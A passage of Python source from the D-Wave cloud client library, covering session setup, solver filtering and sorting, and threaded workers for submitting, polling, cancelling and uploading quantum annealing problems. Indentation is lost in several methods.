endpoint += '/'
session = BaseUrlSession(base_url=endpoint)
session.mount('http://', TimeoutingHTTPAdapter(timeout=self.request_timeout))
session.mount('https://', TimeoutingHTTPAdapter(timeout=self.request_timeout))
if self.headers:
session.headers.update(self.headers)
session.headers.update({'X-Auth-Token': self.token,
'User-Agent': user_agent(__packagename__, __version__)})
session.proxies = {'http': self.proxy, 'https': self.proxy}
if self.permissive_ssl:
session.verify = False
if self.connection_close:
session.headers.update({'Connection': 'close'})
# Debug-log headers
logger.debug("create_session(session.headers=%r)", session.headers)
return session
    def close(self):
        """Perform a clean shutdown.

        Waits for all the currently scheduled work to finish, kills the workers,
        and closes the connection pool.

        .. note:: Ensure your code does not submit new work while the connection
            is closing. Where possible, use a context manager
            (a :code:`with Client.from_config(...) as` construct) to ensure all
            resources are properly closed.

        Examples:
            >>> from dwave.cloud import Client
            >>> client = Client.from_config()
            >>> # code that uses client
            >>> client.close()
        """
        # Finish all the work that requires the connection.
        # Order matters: drain queues before posting kill-tasks, so no
        # scheduled work is lost.
        logger.debug("Joining submission queue")
        self._submission_queue.join()

        logger.debug("Joining cancel queue")
        self._cancel_queue.join()

        logger.debug("Joining poll queue")
        self._poll_queue.join()

        logger.debug("Joining load queue")
        self._load_queue.join()

        logger.debug("Shutting down problem upload executor")
        self._upload_problem_executor.shutdown()

        logger.debug("Shutting down problem part upload executor")
        self._upload_part_executor.shutdown()

        # Send kill-task to all worker threads
        # Note: threads can't be 'killed' in Python, they have to die by
        # natural causes
        for _ in self._submission_workers:
            self._submission_queue.put(None)
        for _ in self._cancel_workers:
            self._cancel_queue.put(None)
        for _ in self._poll_workers:
            # poll queue is a PriorityQueue: -1 sorts ahead of any real poll
            self._poll_queue.put((-1, None))
        for _ in self._load_workers:
            self._load_queue.put(None)

        # Wait for threads to die
        for worker in chain(self._submission_workers, self._cancel_workers,
                            self._poll_workers, self._load_workers):
            worker.join()

        # Close the main thread's session
        self.session.close()
    def __enter__(self):
        """Let connections be used in with blocks."""
        return self
    def __exit__(self, *args):
        """At the end of a with block perform a clean shutdown of the connection."""
        self.close()
        # Returning False propagates any exception raised inside the block.
        return False
    @staticmethod
    def is_solver_handled(solver):
        """Determine if the specified solver should be handled by this client.

        Default implementation accepts all solvers (always returns True).
        Override this predicate function in a subclass to specialize the
        client for a particular type of solvers.

        Examples:
            This function accepts only solvers named "My_Solver_*".

            .. code:: python

                @staticmethod
                def is_solver_handled(solver):
                    return solver and solver.id.startswith('My_Solver_')

        """
        return True
    @cached(maxage=_SOLVERS_CACHE_MAXAGE)
    def _fetch_solvers(self, name=None):
        """Fetch solver definition(s) from the API and build Solver objects.

        Args:
            name (str, default=None): Fetch only the named solver; when None,
                fetch all solvers available to this account.

        Returns:
            list: Solver instances accepted by :meth:`is_solver_handled`.

        Raises:
            RequestTimeout: request to the API timed out.
            SolverAuthenticationError: API returned 401.
            SolverNotFoundError: a named solver was requested but not found.
        """
        if name is not None:
            logger.info("Fetching definition of a solver with name=%r", name)
            url = 'solvers/remote/{}/'.format(name)
        else:
            logger.info("Fetching definitions of all available solvers")
            url = 'solvers/remote/'

        try:
            response = self.session.get(url)
        except requests.exceptions.Timeout:
            raise RequestTimeout

        if response.status_code == 401:
            raise SolverAuthenticationError

        if name is not None and response.status_code == 404:
            raise SolverNotFoundError("No solver with name={!r} available".format(name))

        response.raise_for_status()
        data = response.json()

        # normalize: single named solver comes back as a bare object
        if name is not None:
            data = [data]

        logger.debug("Received solver data for %d solver(s).", len(data))
        # NOTE(review): `trace` is not a stdlib logging level; presumably
        # added elsewhere in this package — verify before relying on it.
        logger.trace("Solver data received for solver name=%r: %r", name, data)

        solvers = []
        for solver_desc in data:
            # Try each known solver class in turn; first one that both
            # parses the description and is handled by this client wins.
            for solver_class in available_solvers:
                try:
                    logger.debug("Trying to instantiate %r", solver_class.__name__)
                    solver = solver_class(self, solver_desc)
                    if self.is_solver_handled(solver):
                        solvers.append(solver)
                        logger.info("Adding solver %r", solver)
                        break
                    else:
                        logger.debug("Skipping solver %r (not handled by this client)", solver)

                except UnsupportedSolverError as e:
                    logger.debug("Skipping solver due to %r", e)

            # propagate all other/decoding errors, like InvalidAPIResponseError, etc.

        return solvers
def get_solvers(self, refresh=False, order_by='avg_load', **filters):
"""Return a filtered list of solvers handled by this client.
Args:
refresh (bool, default=False):
Force refresh of cached list of solvers/properties.
order_by (callable/str/None, default='avg_load'):
Solver sorting key function (or :class:`Solver` attribute/item
dot-separated path). By default, solvers are sorted by average
load. To explicitly not sort the solvers (and use the API-returned
order), set ``order_by=None``.
Signature of the `key` `callable` is::
key :: (Solver s, Ord k) => s -> k
Basic structure of the `key` string path is::
"-"? (attr|item) ( "." (attr|item) )*
For example, to use solver property named ``max_anneal_schedule_points``,
available in ``Solver.properties`` dict, you can either specify a
callable `key`::
key=lambda solver: solver.properties['max_anneal_schedule_points']
or, you can use a short string path based key::
key='properties.max_anneal_schedule_points'
Solver derived properties, available as :class:`Solver` properties
can also be used (e.g. ``num_active_qubits``, ``online``,
``avg_load``, etc).
Ascending sort order is implied, unless the key string path does
not start with ``-``, in which case descending sort is used.
Note: the sort used for ordering solvers by `key` is **stable**,
meaning that if multiple solvers have the same value for the
key, their relative order is preserved, and effectively they are
in the same order as returned by the API.
Note: solvers with ``None`` for key appear last in the list of
solvers. When providing a key callable, ensure all values returned
are of the same type (particularly in Python 3). For solvers with
undefined key value, return ``None``.
**filters:
See `Filtering forms` and `Operators` below.
Solver filters are defined, similarly to Django QuerySet filters, with
keyword arguments of form `<key1>__...__<keyN>[__<operator>]=<value>`.
Each `<operator>` is a predicate (boolean) function that acts on two
arguments: value of feature `<name>` (described with keys path
`<key1.key2...keyN>`) and the required `<value>`.
Feature `<name>` can be:
1) a derived solver property, available as an identically named
:class:`Solver`'s property (`name`, `qpu`, `software`, `online`,
`num_active_qubits`, `avg_load`)
2) a solver parameter, available in :obj:`Solver.parameters`
3) a solver property, available in :obj:`Solver.properties`
4) a path describing a property in nested dictionaries
Filtering forms are:
* <derived_property>__<operator> (object <value>)
* <derived_property> (bool)
This form ensures the value of solver's property bound to `derived_property`,
after applying `operator` equals the `value`. The default operator is `eq`.
For example::
>>> client.get_solvers(avg_load__gt=0.5)
but also::
>>> client.get_solvers(online=True)
>>> # identical to:
>>> client.get_solvers(online__eq=True)
* <parameter>__<operator> (object <value>)
* <parameter> (bool)
This form ensures that the solver supports `parameter`. General operator form can
be used but usually does not make sense for parameters, since values are human-readable
descriptions. The default operator is `available`.
Example::
>>> client.get_solvers(flux_biases=True)
>>> # identical to:
>>> client.get_solvers(flux_biases__available=True)
* <property>__<operator> (object <value>)
* <property> (bool)
This form ensures the value of the solver's `property`, after applying `operator`
equals the righthand side `value`. The default operator is `eq`.
Note: if a non-existing parameter/property name/key given, the default operator is `eq`.
Operators are:
* `available` (<name>: str, <value>: bool):
Test availability of <name> feature.
* `eq`, `lt`, `lte`, `gt`, `gte` (<name>: str, <value>: any):
Standard relational operators that compare feature <name> value with <value>.
* `regex` (<name>: str, <value>: str):
Test regular expression matching feature value.
* `covers` (<name>: str, <value>: single value or range expressed as 2-tuple/list):
Test feature <name> value (which should be a *range*) covers a given value or a subrange.
* `within` (<name>: str, <value>: range expressed as 2-tuple/list):
Test feature <name> value (which can be a *single value* or a *range*) is within a given range.
* `in` (<name>: str, <value>: container type):
Test feature <name> value is *in* <value> container.
* `contains` (<name>: str, <value>: any):
Test feature <name> value (container type) *contains* <value>.
* `issubset` (<name>: str, <value>: container type):
Test feature <name> value (container type) is a subset of <value>.
* `issuperset` (<name>: str, <value>: container type):
Test feature <name> value (container type) is a superset of <value>.
Derived properies are:
* `name` (str): Solver name/id.
* `qpu` (bool): Is solver QPU based?
* `software` (bool): Is solver software based?
* `online` (bool, default=True): Is solver online?
* `num_active_qubits` (int): Number of active qubits. Less then or equal to `num_qubits`.
* `avg_load` (float): Solver's average load (similar to Unix load average).
Common solver parameters are:
* `flux_biases`: Should solver accept flux biases?
* `anneal_schedule`: Should solver accept anneal schedule?
Common solver properties are:
* `num_qubits` (int): Number of qubits available.
* `vfyc` (bool): Should solver work on "virtual full-yield chip"?
* `max_anneal_schedule_points` (int): Piecewise linear annealing schedule points.
* `h_range` ([int,int]), j_range ([int,int]): Biases/couplings values range.
* `num_reads_range` ([int,int]): Range of allowed values for `num_reads` parameter.
Returns:
list[Solver]: List of all solvers that satisfy the conditions.
Note:
Client subclasses (e.g. :class:`dwave.cloud.qpu.Client` or
:class:`dwave.cloud.sw.Client`) already filter solvers by resource
type, so for `qpu` and `software` filters to have effect, call :meth:`.get_solvers`
on base class :class:`~dwave.cloud.client.Client`.
Examples::
client.get_solvers(
num_qubits__gt=2000, # we need more than 2000 qubits
num_qubits__lt=4000, # ... but fewer than 4000 qubits
num_qubits__within=(2000, 4000), # an alternative to the previous two lines
num_active_qubits=1089, # we want a particular number of active qubits
vfyc=True, # we require a fully yielded Chimera
vfyc__in=[False, None], # inverse of the previous filter
vfyc__available=False, # we want solvers that do not advertize the vfyc property
anneal_schedule=True, # we need support for custom anneal schedule
max_anneal_schedule_points__gte=4, # we need at least 4 points for our anneal schedule
num_reads_range__covers=1000, # our solver must support returning 1000 reads
extended_j_range__covers=[-2, 2], # we need extended J range to contain subrange [-2,2]
couplers__contains=[0, 128], # coupler (edge between) qubits (0,128) must exist
couplers__issuperset=[[0,128], [0,4]],
# two couplers required: (0,128) and (0,4)
qubits__issuperset={0, 4, 215}, # qubits 0, 4 and 215 must exist
supported_problem_types__issubset={'ising', 'qubo'},
# require Ising, QUBO or both to be supported
name='DW_2000Q_5', # full solver name/ID match
name__regex='.*2000.*', # partial/regex-based solver name match
chip_id__regex='DW_.*', # chip ID prefix must be DW_
topology__type__eq="chimera" # topology.type must be chimera
)
"""
def covers_op(prop, val):
"""Does LHS `prop` (range) fully cover RHS `val` (range or item)?"""
# `prop` must be a 2-element list/tuple range.
if not isinstance(prop, (list, tuple)) or not len(prop) == 2:
raise ValueError("2-element list/tuple range required for LHS value")
llo, lhi = min(prop), max(prop)
# `val` can be a single value, or a range (2-list/2-tuple).
if isinstance(val, (list, tuple)) and len(val) == 2:
# val range within prop range?
rlo, rhi = min(val), max(val)
return llo <= rlo and lhi >= rhi
else:
# val item within prop range?
return llo <= val <= lhi
def within_op(prop, val):
"""Is LHS `prop` (range or item) fully covered by RHS `val` (range)?"""
try:
return covers_op(val, prop)
except ValueError:
raise ValueError("2-element list/tuple range required for RHS value")
def _set(iterable):
"""Like set(iterable), but works for lists as items in iterable.
Before constructing a set, lists are converted to tuples.
"""
first = next(iter(iterable))
if isinstance(first, list):
return set(tuple(x) for x in iterable)
return set(iterable)
def with_valid_lhs(op):
@wraps(op)
def _wrapper(prop, val):
if prop is None:
return False
return op(prop, val)
return _wrapper
# available filtering operators
ops = {
'lt': with_valid_lhs(operator.lt),
'lte': with_valid_lhs(operator.le),
'gt': with_valid_lhs(operator.gt),
'gte': with_valid_lhs(operator.ge),
'eq': operator.eq,
'available': lambda prop, val: prop is not None if val else prop is None,
'regex': with_valid_lhs(lambda prop, val: re.match("^{}$".format(val), prop)),
# range operations
'covers': with_valid_lhs(covers_op),
'within': with_valid_lhs(within_op),
# membership tests
'in': lambda prop, val: prop in val,
'contains': with_valid_lhs(lambda prop, val: val in prop),
# set tests
'issubset': with_valid_lhs(lambda prop, val: _set(prop).issubset(_set(val))),
'issuperset': with_valid_lhs(lambda prop, val: _set(prop).issuperset(_set(val))),
}
def predicate(solver, query, val):
# needs to handle kwargs like these:
# key=val
# key__op=val
# key__key=val
# key__key__op=val
# LHS is split on __ in `query`
assert len(query) >= 1
potential_path, potential_op_name = query[:-1], query[-1]
if potential_op_name in ops:
# op is explicit, and potential path is correct
op_name = potential_op_name
else:
# op is implied and depends on property type, path is the whole query
op_name = None
potential_path = query
path = '.'.join(potential_path)
if path in solver.derived_properties:
op = ops[op_name or 'eq']
return op(getattr(solver, path), val)
elif pluck(solver.parameters, path, None) is not None:
op = ops[op_name or 'available']
return op(pluck(solver.parameters, path), val)
elif pluck(solver.properties, path, None) is not None:
op = ops[op_name or 'eq']
return op(pluck(solver.properties, path), val)
else:
op = ops[op_name or 'eq']
return op(None, val)
# param validation
sort_reverse = False
if not order_by:
sort_key = None
elif isinstance(order_by, six.string_types):
if order_by[0] == '-':
sort_reverse = True
order_by = order_by[1:]
if not order_by:
sort_key = None
else:
sort_key = lambda solver: pluck(solver, order_by, None)
elif callable(order_by):
sort_key = order_by
else:
raise TypeError("expected string or callable for 'order_by'")
# default filters:
filters.setdefault('online', True)
predicates = []
for lhs, val in filters.items():
query = lhs.split('__')
predicates.append(partial(predicate, query=query, val=val))
logger.debug("Filtering solvers with predicates=%r", predicates)
# optimization for case when exact solver name/id is known:
# we can fetch only that solver
# NOTE: in future, complete feature-based filtering will be on server-side
query = dict(refresh_=refresh)
if 'name' in filters:
query['name'] = filters['name']
if 'name__eq' in filters:
query['name'] = filters['name__eq']
# filter
solvers = self._fetch_solvers(**query)
solvers = [s for s in solvers if all(p(s) for p in predicates)]
# sort: undefined (None) key values go last
if sort_key is not None:
solvers_with_keys = [(sort_key(solver), solver) for solver in solvers]
solvers_with_invalid_keys = [(key, solver) for key, solver in solvers_with_keys if key is None]
solvers_with_valid_keys = [(key, solver) for key, solver in solvers_with_keys if key is not None]
solvers_with_valid_keys.sort(key=operator.itemgetter(0))
solvers = [solver for key, solver in chain(solvers_with_valid_keys, solvers_with_invalid_keys)]
# reverse if necessary (as a separate step from sorting, so it works for invalid keys
# and plain list reverse without sorting)
if sort_reverse:
solvers.reverse()
return solvers
def solvers(self, refresh=False, **filters):
"""Deprecated in favor of :meth:`.get_solvers`."""
warnings.warn("'solvers' is deprecated in favor of 'get_solvers'.", DeprecationWarning)
return self.get_solvers(refresh=refresh, **filters)
def get_solver(self, name=None, refresh=False, **filters):
    """Load the configuration for a single solver.

    Makes a blocking web call to `{endpoint}/solvers/remote/{solver_name}/`,
    where `{endpoint}` is a URL configured for the client, and returns a
    :class:`.Solver` instance that can be used to submit sampling problems
    to the D-Wave API and retrieve results.

    Args:
        name (str):
            ID of the requested solver. ``None`` returns the default solver.
            If default solver is not configured, ``None`` returns the first
            available solver in ``Client``'s class (QPU/software/base).

        refresh (bool):
            Return solver from cache (if cached with ``get_solvers()``),
            unless set to ``True``.

        **filters (keyword arguments, optional):
            Feature filters the solver has to satisfy, including an optional
            ``order_by`` sorting key (default: sort by ID/name). For the
            full list, see :meth:`~dwave.cloud.client.Client.get_solvers`.

    Returns:
        :class:`.Solver`: The first solver matching all filters.

    Raises:
        SolverNotFoundError: No available solver matches the filters.
    """
    logger.debug("Requested a solver that best matches feature filters=%r", filters)

    # backward compatibility: positional `name` acts as a 'name' filter
    if name is not None:
        filters.setdefault('name', name)

    # in absence of other filters, config/env solver filters/name are used
    if not filters and self.default_solver:
        filters = self.default_solver

    # return the first solver that satisfies all filters
    try:
        logger.debug("Fetching solvers according to filters=%r", filters)
        return self.get_solvers(refresh=refresh, **filters)[0]
    except IndexError:
        raise SolverNotFoundError("Solver with the requested features not available")
def _submit(self, body, future):
"""Enqueue a problem for submission to the server.
This method is thread safe.
"""
self._submission_queue.put(self._submit.Message(body, future))
_submit.Message = collections.namedtuple('Message', ['body', 'future'])
def _do_submit_problems(self):
    """Pull problems from the submission queue and submit them.

    Batches up to ``_SUBMIT_BATCH_SIZE`` queued problems into a single
    HTTP POST; on failure the whole batch's futures receive the error.

    Note:
        This method is always run inside of a daemon thread.
    """
    session = self.create_session()
    try:
        while True:
            # Pull as many problems as we can, block on the first one,
            # but once we have one problem, switch to non-blocking then
            # submit without blocking again.

            # `None` task is used to signal thread termination
            item = self._submission_queue.get()
            if item is None:
                break

            ready_problems = [item]
            while len(ready_problems) < self._SUBMIT_BATCH_SIZE:
                try:
                    ready_problems.append(self._submission_queue.get_nowait())
                except queue.Empty:
                    break

            # Submit the problems
            logger.debug("Submitting %d problems", len(ready_problems))
            # bodies are pre-serialized JSON strings; the JSON array is
            # assembled by hand to avoid re-encoding
            body = '[' + ','.join(mess.body for mess in ready_problems) + ']'
            try:
                try:
                    response = session.post('problems/', body)
                    # local clock sampled right after the response arrives,
                    # used later for (server, client) clock-offset estimation
                    localtime_of_response = epochnow()
                except requests.exceptions.Timeout:
                    raise RequestTimeout

                if response.status_code == 401:
                    raise SolverAuthenticationError()
                response.raise_for_status()

                message = response.json()
                logger.debug("Finished submitting %d problems", len(ready_problems))
            except BaseException as exception:
                logger.debug("Submit failed for %d problems", len(ready_problems))
                # auth errors are propagated as-is; everything else is
                # wrapped so callers see an IOError
                if not isinstance(exception, SolverAuthenticationError):
                    exception = IOError(exception)

                # the whole batch failed: deliver the error to every future
                for mess in ready_problems:
                    mess.future._set_error(exception, sys.exc_info())
                    self._submission_queue.task_done()

                continue

            # Pass on the information
            for submission, res in zip(ready_problems, message):
                submission.future._set_clock_diff(response, localtime_of_response)
                self._handle_problem_status(res, submission.future)
                self._submission_queue.task_done()

            # this is equivalent to a yield to scheduler in other threading libraries
            time.sleep(0)

    except BaseException as err:
        logger.exception(err)

    finally:
        session.close()
def _handle_problem_status(self, message, future):
    """Handle the results of a problem submission or results request.

    This method checks the status of the problem and puts it in the correct
    queue (poll for ongoing, load for complete-without-answer), or resolves
    the future directly (answer present, or terminal error).

    Args:
        message (dict):
            Update message from the SAPI server wrt. this problem.
        future (:class:`dwave.cloud.computation.Future`:
            future corresponding to the problem

    Note:
        This method is always run inside of a daemon thread.
    """
    try:
        logger.trace("Handling response: %r", message)
        logger.debug("Handling response for %s with status %s",
                     message.get('id'), message.get('status'))

        # Handle errors in batch mode
        if 'error_code' in message and 'error_msg' in message:
            raise SolverFailureError(message['error_msg'])

        if 'status' not in message:
            raise InvalidAPIResponseError("'status' missing in problem description response")
        if 'id' not in message:
            raise InvalidAPIResponseError("'id' missing in problem description response")

        future.id = message['id']
        future.remote_status = status = message['status']

        # The future may not have the ID set yet
        with future._single_cancel_lock:
            # This handles the case where cancel has been called on a future
            # before that future received the problem id
            if future._cancel_requested:
                if not future._cancel_sent and status == self.STATUS_PENDING:
                    # The problem has been canceled but the status says its still in queue
                    # try to cancel it
                    self._cancel(message['id'], future)
                # If a cancel request could meaningfully be sent it has been now
                future._cancel_sent = True

        # record server-side timing info the first time it appears;
        # later updates never overwrite an already-set timestamp
        if not future.time_received and message.get('submitted_on'):
            future.time_received = parse_datetime(message['submitted_on'])

        if not future.time_solved and message.get('solved_on'):
            future.time_solved = parse_datetime(message['solved_on'])

        if not future.eta_min and message.get('earliest_estimated_completion'):
            future.eta_min = parse_datetime(message['earliest_estimated_completion'])

        if not future.eta_max and message.get('latest_estimated_completion'):
            future.eta_max = parse_datetime(message['latest_estimated_completion'])

        if status == self.STATUS_COMPLETE:
            # TODO: find a better way to differentiate between
            # `completed-on-submit` and `completed-on-poll`.
            # Loading should happen only once, not every time when response
            # doesn't contain 'answer'.

            # If the message is complete, forward it to the future object
            if 'answer' in message:
                future._set_message(message)
            # If the problem is complete, but we don't have the result data
            # put the problem in the queue for loading results.
            else:
                self._load(future)
        elif status in self.ANY_STATUS_ONGOING:
            # If the response is pending add it to the queue.
            self._poll(future)
        elif status == self.STATUS_CANCELLED:
            # If canceled return error
            raise CanceledFutureError()
        else:
            # Return an error to the future object
            errmsg = message.get('error_message', 'An unknown error has occurred.')
            if 'solver is offline' in errmsg.lower():
                raise SolverOfflineError(errmsg)
            else:
                raise SolverFailureError(errmsg)

    except Exception as error:
        # If there were any unhandled errors we need to release the
        # lock in the future, otherwise deadlock occurs.
        future._set_error(error, sys.exc_info())
def _cancel(self, id_, future):
"""Enqueue a problem to be canceled.
This method is thread safe.
"""
self._cancel_queue.put((id_, future))
def _do_cancel_problems(self):
    """Pull ids from the cancel queue and submit them.

    Batches all currently-queued cancellations into a single HTTP DELETE
    request; failures are propagated to each item's future (when present).

    Note:
        This method is always run inside of a daemon thread.
    """
    session = self.create_session()
    try:
        while True:
            # Pull as many problems as we can, block when none are available.

            # `None` task is used to signal thread termination
            item = self._cancel_queue.get()
            if item is None:
                break

            item_list = [item]
            while True:
                try:
                    item_list.append(self._cancel_queue.get_nowait())
                except queue.Empty:
                    break

            # Submit the problems, attach the ids as a json list in the
            # body of the delete query.
            try:
                body = [item[0] for item in item_list]

                try:
                    session.delete('problems/', json=body)
                except requests.exceptions.Timeout:
                    raise RequestTimeout

            except Exception as err:
                for _, future in item_list:
                    if future is not None:
                        future._set_error(err, sys.exc_info())

            # Mark all the ids as processed regardless of success or failure.
            # (Plain loop instead of the former side-effect-only list
            # comprehension, which allocated a throwaway list of Nones.)
            for _ in item_list:
                self._cancel_queue.task_done()

            # this is equivalent to a yield to scheduler in other threading libraries
            time.sleep(0)

    except Exception as err:
        logger.exception(err)

    finally:
        session.close()
def _is_clock_diff_acceptable(self, future):
if not future or future.clock_diff is None:
return False
logger.debug("Detected (server,client) clock offset: approx. %.2f sec. "
"Acceptable offset is: %.2f sec",
future.clock_diff, self._CLOCK_DIFF_MAX)
return future.clock_diff <= self._CLOCK_DIFF_MAX
def _poll(self, future):
    """Enqueue a problem to poll the server for status.

    Schedules the next poll with exponential back-off (doubling, clipped
    to [_POLL_BACKOFF_MIN, _POLL_BACKOFF_MAX]), using the next poll's
    timestamp as priority in the poll queue.

    Raises:
        PollingTimeout: If the future would exceed ``polling_timeout``
            by the time of the next scheduled poll.
    """
    if future._poll_backoff is None:
        # on first poll, start with minimal back-off
        future._poll_backoff = self._POLL_BACKOFF_MIN
    else:
        # on subsequent polls, do exponential back-off, clipped to a range
        future._poll_backoff = \
            max(self._POLL_BACKOFF_MIN,
                min(future._poll_backoff * 2, self._POLL_BACKOFF_MAX))

    # for poll priority we use timestamp of next scheduled poll
    at = time.time() + future._poll_backoff

    now = utcnow()
    future_age = (now - future.time_created).total_seconds()
    logger.debug("Polling scheduled at %.2f with %.2f sec new back-off for: %s (future's age: %.2f sec)",
                 at, future._poll_backoff, future.id, future_age)

    # don't enqueue for next poll if polling_timeout is exceeded by then
    future_age_on_next_poll = future_age + (at - datetime_to_timestamp(now))
    if self.polling_timeout is not None and future_age_on_next_poll > self.polling_timeout:
        logger.debug("Polling timeout exceeded before next poll: %.2f sec > %.2f sec, aborting polling!",
                     future_age_on_next_poll, self.polling_timeout)
        raise PollingTimeout

    self._poll_queue.put((at, future))
def _do_poll_problems(self):
    """Poll the server for the status of a set of problems.

    Groups futures whose polls are scheduled within ``_POLL_GROUP_TIMEFRAME``
    into a single status request (at most ``_STATUS_QUERY_SIZE`` at a time).

    Note:
        This method is always run inside of a daemon thread.
    """
    session = self.create_session()
    try:
        # grouped futures (all scheduled within _POLL_GROUP_TIMEFRAME)
        frame_futures = {}

        def task_done():
            self._poll_queue.task_done()

        def add(future):
            # add future to query frame_futures
            # returns: worker lives on?

            # `None` task signifies thread termination
            if future is None:
                task_done()
                return False

            if future.id not in frame_futures and not future.done():
                frame_futures[future.id] = future
            else:
                task_done()

            return True

        while True:
            frame_futures.clear()

            # blocking add first scheduled
            frame_earliest, future = self._poll_queue.get()
            if not add(future):
                return

            # try grouping if scheduled within grouping timeframe
            while len(frame_futures) < self._STATUS_QUERY_SIZE:
                try:
                    task = self._poll_queue.get_nowait()
                except queue.Empty:
                    break

                at, future = task
                if at - frame_earliest <= self._POLL_GROUP_TIMEFRAME:
                    if not add(future):
                        return
                else:
                    # too far in the future for this frame: put it back
                    task_done()
                    self._poll_queue.put(task)
                    break

            # build a query string with ids of all futures in this frame
            ids = [future.id for future in frame_futures.values()]
            logger.debug("Polling for status of futures: %s", ids)
            query_string = 'problems/?id=' + ','.join(ids)

            # if futures were cancelled while `add`ing, skip empty frame
            if not ids:
                continue

            # wait until `frame_earliest` before polling
            delay = frame_earliest - time.time()
            if delay > 0:
                logger.debug("Pausing polling %.2f sec for futures: %s", delay, ids)
                time.sleep(delay)
            else:
                logger.trace("Skipping non-positive delay of %.2f sec", delay)

            # execute and handle the polling request
            try:
                logger.trace("Executing poll API request")

                try:
                    response = session.get(query_string)
                except requests.exceptions.Timeout:
                    raise RequestTimeout

                if response.status_code == 401:
                    raise SolverAuthenticationError()

                # assume 5xx errors are transient, and don't abort polling
                if 500 <= response.status_code < 600:
                    logger.warning(
                        "Received an internal server error response on "
                        "problem status polling request (%s). Assuming "
                        "error is transient, and resuming polling.",
                        response.status_code)

                    # add all futures in this frame back to the polling queue
                    # XXX: logic split between `_handle_problem_status` and here
                    for future in frame_futures.values():
                        self._poll(future)

                else:
                    # otherwise, fail
                    response.raise_for_status()

                    # or handle a successful request
                    statuses = response.json()
                    for status in statuses:
                        self._handle_problem_status(status, frame_futures[status['id']])

            except BaseException as exception:
                if not isinstance(exception, SolverAuthenticationError):
                    exception = IOError(exception)

                # BUGFIX: pass `exception` directly; it was previously
                # wrapped in IOError a second time here, producing
                # IOError(IOError(...)) and converting auth errors (which
                # the isinstance check above deliberately preserves) into
                # plain IOErrors.
                for id_ in frame_futures.keys():
                    frame_futures[id_]._set_error(exception, sys.exc_info())

            for id_ in frame_futures.keys():
                task_done()

            time.sleep(0)

    except Exception as err:
        logger.exception(err)

    finally:
        session.close()
def _load(self, future):
"""Enqueue a problem to download results from the server.
Args:
future (:class:`~dwave.cloud.computation.Future`):
Future object corresponding to the remote computation.
This method is thread-safe.
"""
self._load_queue.put(future)
def _do_load_results(self):
    """Submit a query asking for the results for a particular problem.

    To request the results of a problem: ``GET /problems/{problem_id}/``

    Note:
        This method is always run inside of a daemon thread.
    """
    session = self.create_session()
    try:
        while True:
            # Select a problem
            future = self._load_queue.get()
            # `None` task signifies thread termination
            if future is None:
                break
            logger.debug("Loading results of: %s", future.id)

            # Submit the query
            query_string = 'problems/{}/'.format(future.id)
            try:
                try:
                    response = session.get(query_string)
                except requests.exceptions.Timeout:
                    raise RequestTimeout

                if response.status_code == 401:
                    raise SolverAuthenticationError()
                response.raise_for_status()

                message = response.json()
            except BaseException as exception:
                if not isinstance(exception, SolverAuthenticationError):
                    exception = IOError(exception)

                # BUGFIX: pass `exception` directly (matching
                # `_do_submit_problems`); it was previously wrapped in
                # IOError a second time, producing IOError(IOError(...))
                # and converting auth errors into plain IOErrors.
                future._set_error(exception, sys.exc_info())
                # NOTE(review): this path skips `task_done()` unlike the
                # success path — verify whether queue join accounting
                # depends on it before changing.
                continue

            # Dispatch the results, mark the task complete
            self._handle_problem_status(message, future)
            self._load_queue.task_done()

            # this is equivalent to a yield to scheduler in other threading libraries
            time.sleep(0)

    except Exception as err:
        # consistent with the other worker loops: log with full traceback
        logger.exception(err)

    finally:
        session.close()
def upload_problem_encoded(self, problem, problem_id=None):
"""Initiate multipart problem upload, returning the Problem ID in a
:class:`~concurrent.futures.Future`.
Args:
problem (bytes-like/file-like):
Encoded problem data to upload.
problem_id (str, optional):
Problem ID. If provided, problem will be re-uploaded. Previously
uploaded parts, with a matching checksum, are skipped.
Returns:
:class:`concurrent.futures.Future`[str]:
Problem ID in a Future. Problem ID can be used to submit
problems by reference.
Note:
For a higher-level interface, use upload/submit solver methods.
"""
return self._upload_problem_executor.submit(
self._upload_problem_worker, problem=problem, problem_id=problem_id)
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _initiate_multipart_upload(session, size):
    """Start a new multipart upload of `size` bytes; returns the new
    problem ID. Sync http request using `session`."""
    logger.debug("Initiating problem multipart upload (size=%r)", size)

    path = 'bqm/multipart'
    body = dict(size=size)

    logger.trace("session.post(path=%r, json=%r)", path, body)
    try:
        response = session.post(path, json=body)
    except requests.exceptions.Timeout:
        raise RequestTimeout

    if response.status_code == 401:
        raise SolverAuthenticationError()

    logger.trace("Multipart upload initiate response: %r", response.text)
    response.raise_for_status()

    try:
        problem_id = response.json()['id']
    except KeyError:
        raise InvalidAPIResponseError("problem ID missing")

    logger.debug("Multipart upload initiated (problem_id=%r)", problem_id)
    return problem_id
@staticmethod
def _digest(data):
# data: bytes => md5(data): bytes
return hashlib.md5(data).digest()
@staticmethod
def _checksum_b64(digest):
# digest: bytes => base64(digest): str
return base64.b64encode(digest).decode('ascii')
@staticmethod
def _checksum_hex(digest):
# digest: bytes => hex(digest): str
return codecs.encode(digest, 'hex').decode('ascii')
@staticmethod
def _combined_checksum(checksums):
# TODO: drop this requirement server-side
# checksums: Dict[int, str] => hex(md5(cat(digests))): str
combined = ''.join(h for _, h in sorted(checksums.items()))
digest = codecs.decode(combined, 'hex')
return Client._checksum_hex(Client._digest(digest))
@staticmethod
@retried(_UPLOAD_PART_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _upload_multipart_part(session, problem_id, part_id, part_stream,
                           uploaded_part_checksum=None):
    """Upload one problem part. Sync http request.

    Args:
        session (:class:`requests.Session`):
            Session used for all API requests.
        problem_id (str):
            Problem id.
        part_id (int):
            Part number/id.
        part_stream (:class:`io.BufferedIOBase`/binary-stream-like):
            Problem part data container that supports `read` operation.
        uploaded_part_checksum (str/None):
            Checksum of previously uploaded part. Optional, but if specified
            checksum is verified, and part is uploaded only if checksums
            don't match.

    Returns:
        Hex digest of part data MD5 checksum.
    """
    logger.debug("Uploading part_id=%r of problem_id=%r", part_id, problem_id)

    # TODO: work-around to get a checksum of a binary stream (avoid 2x read)
    data = part_stream.read()
    digest = Client._digest(data)
    b64digest = Client._checksum_b64(digest)
    hexdigest = Client._checksum_hex(digest)
    # release the buffered copy as soon as the digests are computed
    del data

    if uploaded_part_checksum is not None:
        if hexdigest == uploaded_part_checksum:
            logger.debug("Uploaded part checksum matches. "
                         "Skipping upload for part_id=%r.", part_id)

            return hexdigest
        else:
            logger.debug("Uploaded part checksum does not match. "
